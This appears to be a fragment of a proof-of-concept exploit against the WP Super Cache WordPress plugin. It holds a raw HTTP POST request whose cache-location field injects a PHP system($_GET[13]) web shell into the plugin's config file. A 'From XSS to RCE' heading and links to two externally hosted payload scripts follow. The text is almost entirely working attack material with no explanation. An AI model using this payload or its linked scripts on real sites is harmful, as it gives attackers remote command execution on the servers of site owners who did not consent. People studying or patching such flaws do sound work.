User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 501 Cookie: [cookies] _wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings&action=scupdates&wp_cache_enabled=1&wp_cache_mod_rewrite=0&wp_cache_not_logged_in=2&cache_rebuild_files=1&wp_cache_location=%2Fvar%2Fwww%2Fyour%2Fown%2Fpath%2Fexample.com%2Fwp-content%2Fcache%2F%27%3Bsystem%28%24_GET%5B13%5D%29%3Binclude_once+%5C%27wp-cache-config.php%5C%27%3B%27&_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings ### -- [ PoC #2 | From XSS to RCE | Cache Location: ] [!] https://m0ze.ru/payload/wp-super-cache-rce.js [!] https://m0ze.ru/payload/wp-super-cache-rce-j.js